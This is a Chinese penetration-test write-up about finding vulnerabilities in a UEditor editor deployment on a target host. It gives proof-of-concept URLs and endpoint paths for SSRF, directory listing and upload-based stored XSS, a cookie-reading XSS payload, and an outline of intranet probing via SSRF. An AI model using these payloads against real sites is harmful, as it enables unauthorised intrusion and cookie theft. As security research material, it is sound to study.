(已知目标ip为1.1.1.1)
使用fofa看看有哪些web服务:
我一般会习惯性的F12、刷新看看网站会加载哪些资源(总会出现一些奇妙的路径)
如图:
ueditor+jsp
-
SSRF
-
目录遍历
-
文件上传 => Stored XSS
-
反射型XSS
首先确定ueditor的版本
阅读js源码发现,可以在控制台通过UE.version获得editor的版本
console.log(UE.version)
SSRF
已知该版本ueditor的ssrf触发点:
/jsp/controller.jsp?action=catchimage&source[]=/jsp/getRemoteImage.jsp?upfile=/php/controller.php?action=catchimage&source[]=
使用百度logo构造poc:
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=catchimage&source[]=https://www.baidu.com/img/PCtm_d9c8750bed0b3c7d089fa7d55720d6cf.png
成功,ssrf一枚!
对于后续利用姿势:
-
内网探测
-
应用识别
-
漏洞利用
-
......
简单叙述一下扩大战果的思路:
进行内网探测,查看内网开放的主机和端口。然后通过访问开放的端口返回的一些特征去识别在该服务器上部署的服务与应用,最后针对性地采用一些payload去判断是否存在漏洞。
这里附上ssrf内网探测的脚本:
(来源:猎户攻防实验室)
文件上传 => Stored XSS
已知其上传路径为:
/asp/controller.asp?action=uploadimage/asp/controller.asp?action=uploadfile/net/controller.ashx?action=uploadimage/net/controller.ashx?action=uploadfile/php/controller.php?action=uploadfile/php/controller.php?action=uploadimage/jsp/controller.jsp?action=uploadfile/jsp/controller.jsp?action=uploadimag
xml xss poc:
文件遍历:
已知该版本ueditor的文件遍历触发点:
/jsp/controller.jsp?action=listimage/jsp/controller.jsp?action=listfile/net/controller.ashx?action=listimage/net/controller.ashx?action=listfile...
根据漏洞触发点构造poc:
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listfile
http://1.1.1.1:8080/cmd/ueditor/jsp/controller.jsp?action=listimage
XSS
已知该洞的触发点:
/php/getContent.php/asp/getContent.asp/jsp/getContent.jsp/net/getContent.ashx# poc# myEditor中的’ E ’必须大写,小写无效。postmyEditor=<script>alert(document.cookie)</script>
由于目标站点不存在该文件:
所以我在网上找了一处案例来演示一番:
(图自:https://blog.csdn.net/yun2diao/)
###分割线
希望自己在每一次的复盘中都能有所收获。
在我看来,学习的目的并不是为了证明你学到了什么,而是在每一次的学习/工作中去发现自己还有哪些技能/知识没有掌握,然后去跟进学习。
本文始发于微信公众号(don9sec):记一次对ueditor的捡漏之旅
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论